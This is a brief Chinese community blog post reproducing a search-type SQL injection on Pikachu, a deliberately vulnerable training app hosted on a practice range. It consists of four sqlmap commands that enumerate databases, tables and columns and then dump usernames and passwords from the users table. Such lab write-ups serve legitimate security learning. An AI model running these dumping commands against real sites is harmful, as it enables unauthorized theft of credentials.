pikachu--sql(搜索型)漏洞复现

举报
亿人安全 发表于 2023/05/16 10:47:31 2023/05/16
【摘要】 1./pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A22.https://bachang.ikillyou.topsqlmap.py -u "https://bachang.ikillyou.top/pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%9...

1./pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A2

2.https://bachang.ikillyou.top

sqlmap.py -u "https://bachang.ikillyou.top/pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A2" --dbms mysql --dbs --batch

sqlmap.py -u "https://bachang.ikillyou.top/pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A2" --dbms mysql -D pikachu --tables --batch --smart

sqlmap.py -u "https://bachang.ikillyou.top/pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A2" --dbms mysql -D pikachu -T users --columns --smart --batch

sqlmap.py -u "https://bachang.ikillyou.top/pikachu/vul/sqli/sqli_search.php?name=abc&submit=%E6%90%9C%E7%B4%A2" --dbms mysql -D pikachu -T users -C username,password --dump --smart --batch


【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
SQL
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入